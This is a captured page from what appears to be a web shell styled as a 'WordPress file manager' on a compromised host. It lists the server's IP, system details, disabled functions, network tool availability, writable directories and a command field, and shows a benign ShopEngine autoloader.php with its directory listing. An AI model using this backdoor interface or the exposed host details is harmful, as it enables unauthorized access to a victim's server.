GRAYBYTE WORDPRESS FILE MANAGER5354

Server IP : 68.65.123.43 / Your IP : 216.73.216.162
System : Linux server266.web-hosting.com 4.18.0-513.18.1.lve.el8.x86_64 #1 SMP Thu Feb 22 12:55:50 UTC 2024 x86_64
PHP Version : 8.0.30
Disable Function : NONE
cURL : ON | WGET : ON | Sudo : OFF | Pkexec : OFF
Directory : /home/inteuuod/public_html/1663847279691/wp-content/plugins/shopengine/
Upload Files :
Current_dir [ Writeable ] Document_root [ Writeable ]

Command :


Current File : /home/inteuuod/public_html/1663847279691/wp-content/plugins/shopengine//autoloader.php
<?php

namespace ShopEngine;


defined('ABSPATH') || exit;

/**
 * ShopEngine autoloader.
 * Handles dynamically loading classes only when needed.
 *
 * @since 1.0.0
 */
class Autoloader
{

	/**
	 * Run autoloader.
	 * Register a function as `__autoload()` implementation.
	 *
	 * @since 1.0.0
	 * @access public
	 */
	public static function run() {
		spl_autoload_register([__CLASS__, 'autoload']);
	}


	/**
	 *
	 * @param $class_name
	 */
	private static function autoload($class_name) {

		if(0 !== strpos($class_name, __NAMESPACE__)) {
			return;
		}

		$file_name = strtolower(
			preg_replace(
				['/\b' . __NAMESPACE__ . '\\\/', '/([a-z])([A-Z])/', '/_/', '/\\\/'],
				['', '$1-$2', '-', DIRECTORY_SEPARATOR],
				$class_name
			)
		);


		$file = plugin_dir_path(__FILE__) . $file_name . '.php';

		if(file_exists($file)) {

			require_once($file);
		}
	}
}


/**
 * Calling the autoloader to class files
 *
 */
Autoloader::run();



[ Back ]
Name
Size
Last Modified
Owner / Group
Permissions
Options
..
--
July 10 2025 04:32:19
inteuuod / inteuuod
0755
assets
--
July 10 2025 04:32:20
inteuuod / inteuuod
0755
base
--
July 10 2025 04:32:20
inteuuod / inteuuod
0755
compatibility
--
July 10 2025 04:32:20
inteuuod / inteuuod
0755
core
--
July 10 2025 04:32:20
inteuuod / inteuuod
0755
languages
--
July 10 2025 04:32:20
inteuuod / inteuuod
0755
libs
--
July 10 2025 04:32:20
inteuuod / inteuuod
0755
modules
--
July 10 2025 04:32:20
inteuuod / inteuuod
0755
traits
--
July 10 2025 04:32:20
inteuuod / inteuuod
0755
utils
--
July 10 2025 04:32:20
inteuuod / inteuuod
0755
widgets
--
July 10 2025 04:32:20
inteuuod / inteuuod
0755
.htaccess
0.41 KB
July 10 2025 04:32:20
inteuuod / inteuuod
0644
autoloader.php
0.922 KB
September 22 2022 11:53:49
inteuuod / inteuuod
0644
plugin.php
11.707 KB
September 22 2022 11:53:46
inteuuod / inteuuod
0644
readme.txt
56.762 KB
September 22 2022 11:53:50
inteuuod / inteuuod
0644
shopengine.php
5.053 KB
September 22 2022 11:53:54
inteuuod / inteuuod
0644

GRAYBYTE WORDPRESS FILE MANAGER @ 2025
CONTACT ME
Static GIF